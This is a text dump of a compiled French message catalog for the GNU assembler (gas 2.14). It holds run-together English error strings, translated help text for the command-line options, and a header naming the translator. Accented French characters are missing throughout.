character constant too largecharacter following name is not '#'cmpu doesn't support condition code %sco-processor register expectedcode is ATPCS conformantcode uses 26-bit program countercode uses 32-bit program countercomma missing in .xstabscondition not followed by conditionalizable insnconfusing relocation expressionsconfusion in formal parametersconstant expression expectedconstant expression or register list expectedconstant out of 8-bit range: %dconstant too big to fit into instructionconstant value requiredcontrol register expected, but saw '%.6s'convert_frag
could not set architecture and machinecould not skip to %ld in file `%s'could not update architecture and machinecould not write .mdebug section: %scpu-type = %s
cr%ld is a reserved control registerctoff() relocation used on an instruction which does not support itdata item with alignment larger than locationdest and source1 must be the same registerdestinationdestination operand must be 16 bit registerdestination operand must be 16bit absolute addressdestination operand must be 8 bit registerdestination register is same for parallel insnsdestination register must be r1detected global register use not covered by .register pseudo-opdirective .big encountered when option -big requireddirective .little encountered when option -little requireddirective LOC from within a BSPEC/ESPEC pair is not supporteddirective LOCAL must be placed in code or datadisplacement overflows 12-bit fielddisplacement overflows 8-bit fielddisplacement to defined symbol %s overflows 12-bit fielddisplacement to defined symbol %s overflows 8-bit fielddisplacement to undefined symbol %s overflows 12-bit fielddisplacement to undefined symbol %s overflows 8-bit field displacement too large (%d)displacement too large for this architecture; needs 68020 or higherdivision by zerodivision by zero when setting `%s'dla used to load 32-bit registerdoes not match begin %s%s at %s:%ddsp immediate shift value not constantduplicate !tlsgd!%ldduplicate !tlsldm!%ldduplicate "else"duplicate datalabel operator ignoredduplicated psr bit specifierelse without matching ifempty label field for ISempty symbol name in .def; ignoredemulations not handled in this configurationend of file after a one-character quote; \0 insertedend of file in commentend of file in comment; newline insertedend of file in escape characterend of file in multiline commentend of file inside conditionalend of file not at end of a line; newline insertedend of macro inside conditionalendf without forendi without matching ifending register must be r15endw without whileentity size for SHF_MERGE not specifiedentry instruction with stack decrement < 16error constructing %s pseudo-op table: %serror setting flags for "%s": %serror setting flags for ".sbss": %sestimate size
estimate_size_before_relax calledeven register number requiredexcess operands to %sexcess operands: '%s'expected %cexpected .L, .W or .B for register in indexed addressing modeexpected <nn>expected @(exp, reg16)expected EP registerexpected address expressionexpected closing parenexpected comma after "%s"expected comma after name "%s"expected comma after name `%s' in .size directiveexpected comma after name in .symverexpected comma or colon after symbol name; rest of line ignoredexpected fill pattern missingexpected quoted stringexpected registerexpected simple numberexpected symbol nameexpected valid addressing mode for mova: "@(disp, ea.sz),ERn"expecting )expecting `)' after scale factor in `%s'expecting `,' or `)' after base register in `%s'expecting `,' or `)' after index register in `%s'expecting index register or scale factor after `,'; got '%c'expecting mnemonic; got nothingexpecting operand after ','; got nothingexpecting operand before ','; got nothingexpecting prefix; got nothingexpecting scale factor of 1, 2, 4, or 8: got `%s'expecting string instruction after `%s'expr.c(operand): bad atof_generic return val %dexpression doesn't fit in BYTEexpression doesn't fit in WORDexpression out of rangeexpression out of range: defaulting to 0expression out of range: defaulting to 1expression syntax errorexpression too complexextended instruction in delay slotextended operand requested but not requiredextra .LABEL arguments ignored.failed for %d
failed general register sanity check.failed regnum sanity check.failed sanity checkfailed sanity check.failed sanity check: long_jumpfailed sanity check: short_jumpfailed special case insn sanity checkfailed to read instruction table %s
failed to set up debugging information: %sfake .file after real onefield fx_size too small to hold %dfield size must be 16 when value is relocatablefield value "%s" too complex for a bitfieldfield value truncatedfield width "%s" too complex for a bitfieldfield width %lu too big to fit in %d bytes: truncated to %d bitsfile not found: %sfile number %ld already allocatedfile number less than onefilename goes over one page boundaryfirst register must be r4fixes not all moved from %sflag for {c}psr instruction expectedfloating point args are in fp regsfloating point constant too largefloating point number invalidfloating point number invalid; zero assumedformat = %s
found %d operands for '%s':  Expected %dfound too many (%d) operands for '%s':  Expected %dframe reg expected, using $%d.garbage after index spec ignoredgarbage at end of linegarbage following instructiongenerate PIC codeget_expanded_loop_offset: invalid opcodegroup name for SHF_GROUP not specifiedhere is the "else" of the unterminated conditionalhere is the previous "else"here is the previous "if"here is the start of the unterminated conditionalhigh bits set in register list expressioni860_convert_frag
i860_estimate_size_before_relax
identifier+constant@%s means identifier@%s+constantidentifier+constant@got means identifier@got+constantif writeback register is in list, it must be the lowest reg in the listignoring bad alignmentignoring changed section attributes for %signoring changed section entity size for %signoring extra '-rename-section' delimiter ':'ignoring fill value in absolute sectionignoring incorrect section type for %signoring invalid '-rename-section' specification: '%s'ignoring operands: %s ignoring redefinition of register alias '%s'ignoring unrecognized .endian type `%s'iif convert internal pcrel/binaryiif convert internal pcrel/pointerillegal %srelocation size: %dillegal .stab%c directive, bad characterillegal .stabx expression; zero assumedillegal expressionillegal literalillegal opcode %s for mcu %sillegal operandillegal operand - register name found where none expectedillegal operandsillegal register after @illegal register after @-illegal register included in listimmediate 1 or 2 expectedimmediate is not a power of twoimmediate must be 1 or 2immediate operand illegal with absolute jumpimmediate operand is too largeimmediate out of rangeimmediate value out of rangeimproper number of operands.  expecting %d, got %dinappropriate arguments for opcode `%s'incorrect register in reglistindirect %s without `*'inserting "%s" into %s alias hash table failed: %sinserting "%s" into %s name hash table failed: %sinserting "%s" into string hash table: %sinserting "%s" into symbol table failed: %sinserting "%s" into tag hash table: %sinsn can't be combined with parallel processing insninsn cannot be combined with pmulsinstruction %s requires %d operand(s)instruction '%s' cannot be executed in parallel.instruction '%s' is for the M32RX onlyinstruction is not conditionalinstruction not allowed: %sinstruction requires labelinstruction requires label or value in range -511:512instruction requires label sans '$'internal Error, line %d, %sinternal confusion: relocation in a section without contentsinternal error: bad mips16 opcode: %s %s
internal error: can't export reloc type %d (`%s')internal error: can't hash `%s': %s
internal error: can't hash macro `%s': %sinternal error: can't hash opcode `%s': %sinternal error: can't install fix for reloc type %d (`%s')internal error: fixup not contained within fraginternal error: lookup/get operands failedinternal error: losing opcode: `%s' "%s"
internal error: relaxation failedinternal error: relaxation requires too many stepsinternal error: unknown dwarf2 formatinternal error? cannot generate `%s' relocationinternal failure in parse_register_listinternal inconsistency in %s: bdap.w with no symbolinternal inconsistency in %s: bdapq no symbolinternal inconsistency problem in %s: fr_subtype %dinternal inconsistency problem in %s: fr_symbol %lxinternal inconsistency problem in %s: resolved symbolinternal relocation (type: IMMEDIATE) not fixed upinternal: BFD_RELOC_MMIX_BASE_PLUS_OFFSET not resolved to sectioninternal: GREG expression not resolved to sectioninternal: bad mips opcode (bits 0x%lx undefined): %s %sinternal: bad mips opcode (mask error): %s %sinternal: bad mips opcode (unknown extension operand type `+%c'): %s %sinternal: bad mips opcode (unknown operand type `%c'): %s %sinternal: can't hash `%s': %sinternal: mmix_prefix_name but empty prefixinternal: unexpected relax type %d:%dinternal: unhandled label %sinternal_relocation (type: OFFSET_IMM) not fixed upinvalid BSPEC expressioninvalid Hi register with immediateinvalid LOC expressioninvalid PIC referenceinvalid abi -mabi=%sinvalid architectural extensioninvalid architecture %sinvalid architecture -A%sinvalid architecture -xarch=%sinvalid architecture -z%sinvalid architecture option -m%s, ignoredinvalid attempt to declare external version name as default in symbol `%s'invalid base register for register offsetinvalid branch operandinvalid byte branch offsetinvalid char %s beginning operand %d `%s'invalid character %s before operand %dinvalid character %s in mnemonicinvalid character %s in operand %dinvalid characters in inputinvalid condition code nameinvalid constantinvalid constant (%lx) after fixupinvalid coprocessor sub-selection value (0-7)invalid default displacement size "%s". Defaulting to %d.invalid empty loopinvalid expression evaluation type %dinvalid expression in load/store multipleinvalid expression in operandinvalid identifier for ".ifdef"invalid immediateinvalid immediate for address calculation (value = 0x%08lX)invalid immediate for stack address calculationinvalid index registerinvalid index size for coldfireinvalid indirect register sizeinvalid instruction for this architecture; needs invalid instruction size selected (%d)invalid last instruction for a zero-overhead loopinvalid listing option `%c'invalid literal constant: pool needs to be closerinvalid merge entity sizeinvalid movx address registerinvalid movx dsp registerinvalid movy address registerinvalid movy dsp registerinvalid numberinvalid offset, value too big (0x%08lX)invalid opcodeinvalid opcode, "%s".invalid operandinvalid operand mode for this architecture; needs 68020 or higherinvalid operand of ()+invalid operand of -()invalid operand of S^#invalid operand size requestedinvalid operand suffixinvalid operand to .code directive (%d) (expecting 16 or 32)invalid operand to opcode %s: `%s'invalid operand, not a 10-bit signed value: %dinvalid operand, not a 11-bit signed value: %dinvalid operand, not a 12-bit signed value: %dinvalid operand, not a 13-bit signed value: %dinvalid operand, not a 16-bit signed value: %dinvalid operand, not a 5-bit unsigned value: %dinvalid operand, not a 6-bit signed value: %dinvalid operand, not a 6-bit unsigned value: %dinvalid operand, not a multiple of 32: %dinvalid operand, not a multiple of 4: %dinvalid operand, not a multiple of 8: %dinvalid operand, not an even value: %dinvalid operandsinvalid operands for opcodeinvalid operands to %sinvalid operands to opcode %s: `%s'invalid pseudo operationinvalid register in & expressioninvalid register listinvalid register list to push/pop instructioninvalid register maskinvalid register nameinvalid register: r15 illegalinvalid relaxation fragment resultinvalid relocation for fieldinvalid relocation for instructioninvalid relocation for operand %d of '%s'invalid scale factorinvalid section for operation on `%s'invalid section for operation on `%s' setting `%s'invalid sections for operation on `%s' and `%s'invalid sections for operation on `%s' and `%s' setting `%s'invalid segment "%s"invalid swi expressioninvalid switch -m%sinvalid syntax for .req directiveinvalid system register nameinvalid unextended operand valuejump to misaligned address (0x%lx)junk `%s' after expressionjunk `%s' after registerjunk at end of line: `%s'la used to load 64-bit addresslabel "$%d" redefinedlabel "%d$" redefinedlast register must be r7left operand is a bignum; integer 0 assumedleft operand is a float; integer 0 assumedlength not neededline %d: rep or repi must include at least 4 instructionsline %d: unable to place address of symbol '%s' into a byteline %d: unable to place address of symbol '%s' into a quadline %d: unable to place address of symbol '%s' into a shortline %d: unable to place value %lx into a byteline %d: unable to place value %lx into a shortline %d: unknown relocation type: 0x%xline number (%d) for .stab%c directive cannot fit in index field (20 bits)line numbers must be positive; line number %d rejectedliteral pool insertion failedliteral pool overflowliteral referenced across section boundarylk addressing modes are invalid for memory-mapped register addressinglo register requiredlocal label `%s' is not definedlong jump requiredloop target does not follow loop instruction in sectionloop too long for LOOP instructionlower 16 bits of mask ignoredlui expression not in range 0..65535macro requires $at register while noat in effectmacro requires $at while $at in usemacros nested too deeplymd_convert_frag
md_estimate_size_before_relax
md_pcrel_from
misaligned datamisaligned offsetmismatch between opcode size and operand sizemismatch between register and suffixmismatched .ebmisplaced .procendmisplaced PIC operandmissing '%c'missing ']'missing .endmissing .end at end of assemblymissing .end or .bend at end of filemissing .funcmissing .procmissing =missing ]missing `}'missing alignmentmissing architectural extensionmissing architecture name `%s'missing argument separator ',' for .cpsetupmissing classmissing close quote; (assumed)missing comma after insn constant
missing condition code in structured control directivemissing cpu architecturemissing cpu name `%s'missing domissing emulation mode namemissing expressionmissing expression in .size directivemissing labelmissing local expressionmissing model parametermissing namemissing opcodemissing operandmissing operand; zero assumedmissing or invalid displacement expression `%s' taken as 0missing real symbol namemissing rename stringmissing separatormissing sizemissing size expressionmissing stringmissing symbol namemissing thenmissing to or downtomissing typemissing valuemissing version name in `%s' for symbol `%s'more than 65K literal poolsmultiple condition specificationsmultiple emulation names specifiedmultiple literals in expansionmultiple movx specificationsmultiple movy specificationsmultiple parallel processing specificationsmultiple sections remapped to output section %smultiple versions [`%s'|`%s'] for symbol `%s'must be @(r0,...)must branch to an address a multiple of 4negative alignmentnegative sizenegative value ignored in %snested .bs blocksnested .ent directivesnew line in titlenext outside of structured loopno '(' to match ')'no '[' to match ']'no current file pointerno file name following -t optionno hppa_fixup entry for fixup type 0x%xno instruction mnemonic suffix given and no register operands; can't size instructionno instruction mnemonic suffix given; can't determine immediate sizeno registered fragment for literalno sequence number after !%sno such architecture modifier: `%s'no such architecture: `%s'no such instruction: `%s'no such sfr in this architectureno suitable GREG definition for operandsno tag specified for %sno way to handle .file within .ent/.end sectionnon-absolute expression in constant fieldnon-absolute value used with .space/.besnon-constant byte countnon-constant expression in ".elseif" statementnon-constant expression in ".if" statementnon-contiguous register rangenon-immediate OPF operand, ignorednot a 16 bit instruction '%s'not enough operands (%d) for '%s'; expected %dnumber of literal tokens != 1number of registers must be in the range [1:4]odd address operand: %ldodd displacement at %xodd distance branch (0x%lx bytes)odd number of bytes in operand descriptionoffset out of rangeoffset too largeonly constant expression allowedonly constant offsets supported in absolute sectiononly lo regs allowed with immediateonly r15 allowed hereonly two consecutive VFP SP registers allowed hereopcode 'NOP.N' unavailable in this configurationopcode `%s' not supported for target %sopcode has no effectopcode not supported on this processoropcode not supported on this processor: %s (%s)open CFI at the end of file; missing .cfi_endproc directiveoperand %s0x%lx out of range.operand is not an immediateoperand must be a constantoperand must be a multiple of 2operand must be a multiple of 4operand must be absolute in range %u..%u, not %ldoperand not a multiple of 4 for PT, PTA or PTB: %doperand number mismatchoperand out of rangeoperand out of range for PT, PTA and PTBoperand out of range, instruction expandedoperand out of range: %ldoperand out of range: %luoperand overflowoperand value out of range for instructionoperand/size mis-matchoperands for opcode `%s' do not match any valid formatoperands mismatchoperands were not reducible at assembly-timeoperation combines symbols in different segmentsoption --link-relax is only supported in b.out formatoption `%s' may not be negatedoption `%s' not recognizedoption `-%c%s' is deprecated: %sout of rangeoverflow in branch to %s; converted into longer instruction sequenceoverflow in literal (.lit8) tableoverflow in literal (.lita) tablep2align not supported on this targetpacking conflict: %s must dispatch sequentiallyparallelpartial line at end of file ignoredpc may not be used with write-backpc-relativepcrel for branch to %s too far (0x%lx)pcrel for loopt too far (0x%lx)pcrel for lrw/jmpi/jsri to %s too far (0x%lx)pcrel too farpointer register (X, Y or Z) requiredpointer register (Y or Z) requiredpointer register Z requiredpost-indexed expression used in preload instructionpre-indexed expression expectedprevious CFI entry not closed (missing .cfi_endproc)pseudo-op illegal within .struct/.unionr14 not allowed herer15 based store not allowedr15 not allowed herer2 should not be used in indexed addressing moderdhi and rdlo must be differentrdhi, rdlo and rm must all be differentre-entrant coderedefinition of global registerredefinition of mcu type %s' to %s'redefinition of mcu type `%s' to `%s'redundant %s prefixreg-reg expectedregister expected, but saw '%.6s'register expected, not '%.100s'register is wrong size for a word %sregister is wrong size for address %sregister list not in ascending orderregister name or number from 0 to 31 requiredregister number above 15 requiredregister number out of rangeregister r%d out of rangeregister r0 cannot be used hereregister r16-r23 requiredregister r24, r26, r28 or r30 requiredregister range not in ascending orderregister rh%d out of rangeregister rl%d out of rangeregister rq%d does not existregister rq%d out of rangeregister rr%d does not existregister rr%d out of rangeregister save offset not a multiple of %uregister section has contents
register syntax is .register %%g[2367],{#scratch|symbolname|#ignore}register value used as expressionrelative address out of rangerelative call out of rangerelative jump out of rangerelaxed out-of-range branch into a jumpreloc %d not supported by object file formatrelocation not applicablerelocation out of rangerelocation overflowrepeat < 0; .fill ignoredresource conflict (A%d)resource conflict (C flag)resource conflict (F flag)resource conflict (PSW)resource conflict (R%d)rest of line ignored; first ignored character is `%c'restore without savereturned from mips_ip(%s) insn_opcode = 0x%x
right operand is a bignum; integer 0 assumedright operand is a float; integer 0 assumedrva without symbolsame type of prefix used twicescale factor invalid on this architecture; needs cpu32 or 68020 or higherscale factor of %d without an index registersdaoff() relocation used on an instruction which does not support itsecond .ent directive found before .end directivesecond operand missingsecond operand must be 1second operand of .insn not a constant
second register should follow dash in register listsection %s renamed multiple timessection `%s' aliased to `%s' is not usedsection change from within a BSPEC/ESPEC pair is not supportedsection symbols are already globalseek to end of .incbin file failed `%s'selected processor does not support ARM opcodesselected processor does not support THUMB opcodesselected processor does not support `%s'sequence number in use for !tlsgd!%ldsequence number in use for !tlsldm!%ldsequentialset: number not in -2147483648..4294967295 rangeset: number not in 0..4294967295 rangesetsw: number not in -2147483648..4294967295 rangesetting incorrect section attributes for %ssetting incorrect section type for %ssetx: illegal temporary register g0setx: temporary register same as destination registershift expression expectedshift expression is too largeshort branch with zero offset: use :wshould have 1 or 2 operandsshould have two operandssigned .word overflow; switch may be too large; %ld at 0x%lxsize negative; .fill ignoredskipping prefixes on this instructionskipping two-word instructionsome symbol undefined; zero assumedsourcesource operand must be 16bit absolute addresssource operand must be 8 bit registersource register must be r1source1 and dest must be same registerspace allocation too complex in absolute sectionspace allocation too complex in common sectionsparc convert_frag
special left instruction `%s' kills instruction `%s' in right containerspecified location wasn't TETRA-alignedspurious operands; (%d operands/instruction max)stand-alone `%s' prefixstart address not supportedstrange paper height, set to no formstring too big (%lu bytes)strings must be placed into a sectionsuffix or operands invalid for `%s'support ARM/Thumb interworkingsymbol "%s" undefined; zero assumedsymbol `%s' aliased to `%s' is not usedsymbol `%s' already definedsymbol `%s' can not be both weak and commonsymbol `%s' is already definedsymbol `%s' is already defined as "%s"/%s%ldsymbol definition loop encountered at `%s'symbol in .toc does not match any .tcsymbol%dsymbols assigned with .eval must begin with a lettersyntax errorsyntax error in .startof. or .sizeof.syntax error in @(disp,[Rn, gbr, pc])syntax error in @(r0,...)syntax error in @(r0...)syntax error in structured control directivesyntax error: condition code not expectedsyntax error: expected `]', found  `%c'syntax error: invalid toc specifier `%s'syntax error: register not expectedsyntax error: system register not expectedsyntax error: value is missing before the register namesyntax error; ')' not allowed heresyntax error; expected ,syntax error; found `%c' but expected `%c'syntax error; missing '(' after displacementsyntax error; missing ')' after base registersystem registers cannot be included in listtag not found for .tag %starget of %s instruction must be a labeltdaoff() relocation used on an instruction which does not support ittext label `%s' aligned to odd boundarythe type of %s is too complex; it will be simplifiedthis addressing mode is not applicable for destination operandthis addressing mode requires base-register writebackthis string may not contain '\0'too few operandstoo many !literal!%ld for %stoo many .dim entriestoo many .size entriestoo many GREG registers allocated (max %d)too many argumentstoo many fixupstoo many lda insns for !gpdisp!%ldtoo many ldah insns for !gpdisp!%ldtoo many lituse insns for !lituse_tlsgd!%ldtoo many lituse insns for !lituse_tlsldm!%ldtoo many memory references for '%s'too many memory references for `%s'too many operandstoo many operands (%d) for '%s'; expected %dtoo many operands: %stoo many positional argumentstoo many st_End'stranslating bgeni to movitranslating bmaski to movitranslating mgeni to movitranslating to `%sp'trap exception not supported at ISA 1truncated file `%s', %ld of %ld bytes readtwo .function pseudo-ops with no intervening .eftype %d reloc done?
unable to compute ADRL instructions for PC offset of 0x%lxunable to widen instructionunaligned data at an absolute location is not supportedunaligned registerunassigned file number %ldunbalanced brackets in operand %d.unbalanced parenthesis in operand %d.undecodable instruction in instruction fragundefined combination of operandsundefined symbol `%s' in operationundefined symbol `%s' in operation setting `%s'unexpected 12-bit reloc typeunexpected 18-bit reloc typeunexpected end of file in irp or irpcunexpected storage class %dunhandled %d
unhandled local relocation fix %sunhandled relocation type %sunhandled: .proc %s,%dunimplemented opcode "%s"unimplemented segment %s in operandunknownunknown ISA level %sunknown MCU: %s
unknown addressing mode %sunknown addressing mode for operand %sunknown architectural extnsion `%s'unknown architecture %sunknown architecture `%s'
unknown argument for .usepvunknown condition code: %sunknown constraint `%c'unknown cpu `%s'unknown directiveunknown escape '\%c' in string; ignoredunknown execution type passed to write_2_short()unknown expression in operand %sunknown expression in operand %s. use #llo() #lhi() #hlo() #hhi() unknown floating point format `%s'
unknown floating type type '%c'unknown instruction '%s'unknown opcodeunknown opcode "%s"unknown opcode %sunknown opcode `%s'unknown opcode1: `%s'unknown opcode2 `%s'.unknown opcode: %sunknown opcode: `%s'unknown operand %sunknown operand shift: %x
unknown operator %sunknown operator %s. Did you mean X(Rn) or #[hl][hl][oi](CONST) ?unknown operator (r%s substituded as a register nameunknown procedure kindunknown pseudo-op: `%s'unknown section attribute '%c'unknown/incorrect operandunmatched '['unmatched end directiveunrecognised cpu type '%s'unrecognized .linkonce type `%s'unrecognized .section attribute: want a,w,x,M,S,G,Tunrecognized characters at end of parallel processing insnunrecognized emulation name `%s'unrecognized fopt optionunrecognized opcodeunrecognized section attributeunrecognized section command `%s'unrecognized section typeunrecognized section type `%s'unrecognized symbol type "%s"unresolvable or nonpositive repeat count; using 1unresolved expression that must be resolvedunresolved loop target symbol: %sunsupported BFD relocation size %uunsupported PC relative reference to different sectionunsupported byte value; use a different suffixunsupported large constantunsupported operands to %s: `%s'unsupported relocationunsupported relocation against %sunsupported relocation for DS offset fieldunsupported relocation typeunsupported section attribute '%c'unsupported variable size or fill valueunterminated stringunterminated string; newline inserteduntil without repeatuse -march=armv2use -march=armv2ause -march=armv3use -march=armv3muse -march=armv4use -march=armv4tuse -march=armv5use -march=armv5tuse -march=armv5teuse -mcpu=alluse -mcpu=arm1use -mcpu=arm2use -mcpu=arm250use -mcpu=arm3use -mcpu=arm6use -mcpu=arm600use -mcpu=arm610use -mcpu=arm620use -mcpu=arm7use -mcpu=arm70use -mcpu=arm700use -mcpu=arm700iuse -mcpu=arm710use -mcpu=arm7100use -mcpu=arm710cuse -mcpu=arm710tuse -mcpu=arm720use -mcpu=arm720tuse -mcpu=arm740tuse -mcpu=arm7500use -mcpu=arm7500feuse -mcpu=arm7duse -mcpu=arm7diuse -mcpu=arm7dmuse -mcpu=arm7dmiuse -mcpu=arm7muse -mcpu=arm7tdmiuse -mcpu=arm8use -mcpu=arm810use -mcpu=arm9use -mcpu=arm920use -mcpu=arm940use -mcpu=arm9tdmiuse -mcpu=iwmmxtuse -mcpu=strongarmuse -mcpu=strongarm110use -mcpu=strongarm1100use -mcpu=strongarm1110use -mcpu=xscaleuse -mfpu=fpa10use -mfpu=fpa11use -mfpu=fpeuse .code16 to ensure correct addressing modeuse either -mfpu=softfpa or -mfpu=softvfpuse frame pointeruse of old and new-style options to set CPU typeuse of old and new-style options to set FPU typeuse of r15 in bx in ARM mode is not really usefuluse of r15 in bxj is not really usefuluse stack size checkingused $at without ".set noat"using a bit field width of zerovalue 0x%lx truncated to 0x%lxvalue of %ld out of byte displacement range.value of %ld out of double word displacement range.value of %ld out of word displacement range.value of %s too large for field of %d bytes at %svalue out of rangevalue out of range: %dvalue too large to fit in %d bitsvirtual memory exhaustedwarning: symbol %s has no csectword of NOPs added between word multiply and 16-bit multiplyword of NOPs added between word multiply and loadwriteback of base register is UNPREDICTABLEwriteback of base register when in register list is UNPREDICTABLEwriteback used in preload instructionwriting or modifying # is unpredictablewrong number of operandswrong register in floating-point reglistyou can't `pop %%cs'zdaoff() relocation used on an instruction which does not support itzero assumed for missing expressionzero used as immediate value{standard input}Project-Id-Version: GNU gas 2.14rel030712
POT-Creation-Date: 2007-10-08 12:03+0100
PO-Revision-Date: 2004-05-10 08:00-0500
Last-Translator: Michel Robitaille <robitail@IRO.UMontreal.CA>
Language-Team: French <traduc@traduc.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8-bit
Plural-Forms: nplurals=2; plural=(n > 1);
                          [dfaut est %d]
                          [dfaut est %s]
	 %s

                          spcifier la variante d'architecture 960
-b                        ajouter du code pour la cueuillette de statistiques au sujet des branchements utiliss
-link-relax               prserver les directives individuelles pour que l'diteur de lien
                          puisse faire la relaxe (format b.out seulement)
-no-relax                 ne pas altrer les instructions comparer-et-aiguiller pour
                          les longs dplacements

                          spcifier la variante d'architecture SPARC
-bump                     avertir lorsque l'assembler change d'architecture
-sparc                    ignor
--enforce-aligned-data    forcer .long, etc.,  tre aligns correctement
-relax                    relaxer les jump et les branchements (par dfaut)
-no-relax                 viter les modification des jump et des branchements

Option D30V:
-O                      rendre le instructions adjacentes courtes parallles
                        si possible.
-n                      avertir de tous les NOP insrs par l'assembleur.
-N                      avertir de tous les NOP insrs aprs des mots multiples
-c                      avertir de tous les symboles ayant des noms identiques 
                        aux noms de registres
-C                      inverse de -c.  -c est le dfaut.
                          registres n'ont pas besoin de prfixe
                          registres auront besoin de  $ -prefix
                          muler la sortie (par dfaut %s)
             enregistrer le type de cpu
        -V                afficher la version de l'assembleur
        -Qy, -Qn          ignor
Option S390:
        -mregnames        permettre les noms symboliques pour les registres
        -mwarn-areg-zero  avertir lorsque des registres de base/index  zro
        -mno-regnames     ne pas permettre les noms symboliques pour les registres
        -m31              dfinir le format de fichier  32 bits
        -m64              dfinir le format de fichier  64 bits
  --MD FICHIER            crire les information de dpendance dans le
                          FICHIER (par dfaut aucun)
  --defsym SYMBOLE=VALEUR dfinir le SYMBOLE avec une valeur
  --execstack             requiert une pile excutable pour cet objet
  --fatal-warnings        traiter les averitssements comme des erreurs
  --help                  afficher l'aide-mmoire et quitter
  --itbl INSTTBL          tendre le jeu d'instructions pour inclure les
                          instructions concordants avec les spcifications
                          dfinies dans le fichier INSTTBL
  --listing-cont-lines    initialiser le nombre maximal de lignes de continuation  utiliser
                          pour la colonne de donne en sortie dans le listing
  --listing-lhs-width     initialiser la largeur en mots de la colonne de donnes
                          en sortie sur le listing
  --listing-lhs-width2    initialiser la largeur en mots des lignes de continuation
                          de la colonne de donnes en sortie; ignor si plus petit que
                          la largeur de la premire ligne
  --listing-rhs-width     initialiser la largeur maximale en caractres des lignes
                          du fichier source
  --no-underscore         les symboles usagers n'ont pas de prfixe
  --noexecstack           ne requiert pas de pile excutable pour cet objet
  --pic                   permetre la gnration de code indpendant de la position
  --statistics            afficher diverses mesures de statistiques de l'excution
  --strip-local-absolute  liminer les symboles absolus locaux
  --target-help           montrer les options spcifiques de la cible
  --traditional-format    utiliser le mme format que l'assembleur natif lorsque c'est possible
  --underscore            symboles usagers sont normalement prfixs avec
                          le caractre de soulignement.
  --version               afficher le numro de la version de l'assembleur et quitter
  --warn                  ne pas supprimer les avertissements
  -D                      produire les messages de dbug assembleur
  -EB                     assembler le code pour un systme de poids fort
  -EL                     assembler le code pour un systme de poids faible
  -I RPERTOIRE           ajouter le RPERTOIRE  la liste de recherche
pour les directive .include
  -J                      ne pas avertir lors d'un dbordement sign
  -K                      avertir lorsque des diffrences sont altres lors de longs dplacements
  -L,--keep-locals        conserver les symboles locaux (i.e. dbutant par  L )
  -M,--mri                assembler en mode compatibilit MRI
  -N                      avertir lorsque l'expansion des branches est faite pour des sauts.
  -Q                      ignor
  -R                      joindre la section de donnes avec la section texte
  -V                 afficher la version de l'assembleur
  -Qy, -Qn           ignor
  -W  --no-warn           supprimer les avertissements
  -Wnp                    identique  -no-warn-explicit-parallel-conflicts
  -Wnuh                   identique  -no-warn-unmatched-high
  -Wp                     identique  -warn-explicit-parallel-conflicts
  -Wuh                    identique  -warn-unmatched-high
  -X                      ignore
  -Z                      gnrer le fichier objet mme aprs des erreurs
  -c                      avertir si un commentaire est trouver
  -f                      escamoter le pr-traitement des espaces blancs et des commentaires
  -fixed-special-register-names
                          permettre seulement les noms originaux de registres spciaux
  -globalize-symbols      rednre tous les symboles globaaux.
  -gnu-syntax             bloquer la la compabitlit de syntaxes mmixal
  -h, -H                  afficher l'aide mmoire.  Dprci.
  -linker-allocated-gregs S'il n'y a pas de dfinition GREG pouvant convenir
                          pour les oprandes d'une instruction, laisser l'diteur de liens
                          faire la rsolution.
  -m32r                   dsactiver le support du jeu d'instructions m32rx
  -m32rx                  supporter le jeu tendu d'instructions m32rx
  -mall-opcodes    accepter tous les opcode AVR, mme non supports par MCU
  -mno-skip-bug    dsactiver les avertissements pour l'escamotage des
                   instructions de 2 mots (par dfaut pour avr4, avr5)
  -mno-wrap        rejeter les instructions rjmp/rcall avec un emballage de 8K
                   (par dfaut pour avr3, avr5)
  -mip2022               restraindre au insns IP2022
  -mip2022ext            supporter le jeu tendu d'instructions IP2022
  -mrelax                   permettre la relche
  -mv850                    le code vise le v850
  -mv850any                 le code est gnrique, peu importe les instructions spcifiques du processeur
  -mv850e                   le code vise le v850e
  -mwarn-signed-overflow    avertir lors de dbordement des valeurs signes immdiates
  -mwarn-unsigned-overflow  avertir s'il y a dbordement des valeurs immdiates non signes
  -n                      ne pas optimiser l'alignement du code
  -q                      ne pas produire d'avertissement
  -no-expand              ne pas faire l'expansion GETA, branchanchement, PUSHJ ou JUMP
                          en de multiples instructions.
  -no-merge-gregs         ne pas faire la fusion des dfinition GREG avec des valeurs proches.
  -no-predefined-syms     ne pas fournir de constantes mmixal
                          implique -fixed-special-register-names.
  -no-warn-explicit-parallel-conflicts  ne pas avertir lorsque des instructions
  -no-warn-unmatched-high ne pas avertir lorsque des relocalisations basses sont manquantes
  -nocpp                  ignore
  -o NOM                  donner le NOM au fichier d'objets de sortie
                          (par dfaut a.out)
  -relax                  crer du code relaxable pour l'diteur de liens
  -w                      ignore
  -warn-explicit-parallel-conflicts     avertir lorsque des instructions parallles
  -warn-unmatched-high    avertir lorsqu'il y a un relocalisation de type haute
                          qui ne concorde pas avec une relocalisation de type basse
  -x                      ne pas avertir pour une oprande avec GETA, un branchement,
                          PUSHJ ou JUMP qui n'est pas  l'intrieur de la gamme.
                          L'diteur de liens interceptera les erreurs. Cela implique
                          -linker-allocated-gregs. (Requiert %s; architecture requise est %s.) *input_line_pointer ==  %c  0x%02x
Options en assembleur spcifiques ARM:
 Options spcifiques de la ligne de commande FR30:
 Option spcifiques de la ligne de commande M32R:
 Options MMIX-spcifiques de la ligne de commande:
 Options V850:
 options de la ligne de commande XSTORMY16 spcifiques:
Options Z8K:
  -z8001                  gnrer le code segment
  -z8002                  gnrer le code non segment
  -linkrelax              crer du code de relche pour l'dition de liens
!%s n'utilise pas un numro de squencerelocalisation !samgp vers le symbole sans .prologue: %s %d  (instance d'un nombre %d d'un tiquette %s) .else non pair avec if  .elseif aprs .else  .elseif sans pairage .if  .endif sans .if # Exemple d'instructions  %s 
	.sect .text
_start:
# registre bars# conflit de longueur#4 n'est pas valide sur H8/300.#<imm16>#<imm8>#<mask>% oprateur a besoin d'une expression absolue%d erreurs%s, %d avertissements%s, gnration d'un fichier objet erron%d erreur%s, %d avertissement%s, pas de fichier objet gnr%d AVERTISSEMENTS, traitement des avertissements comme des erreurs%s -- dclaration  %s  ignore%s NOP insr%s `%s' a dj un alias `%s'registre %s identique  la base de r-criture arrirerelocalisations %s n'entre pas dans %d octetsLa relocalisation %s n'entre pas dans %d octets
%s rduit  %srcursion de symboles %s stoppe  la seconde apparition de  %s %s n'est pas supporte%s sans %s%s: taille des donnes %ld
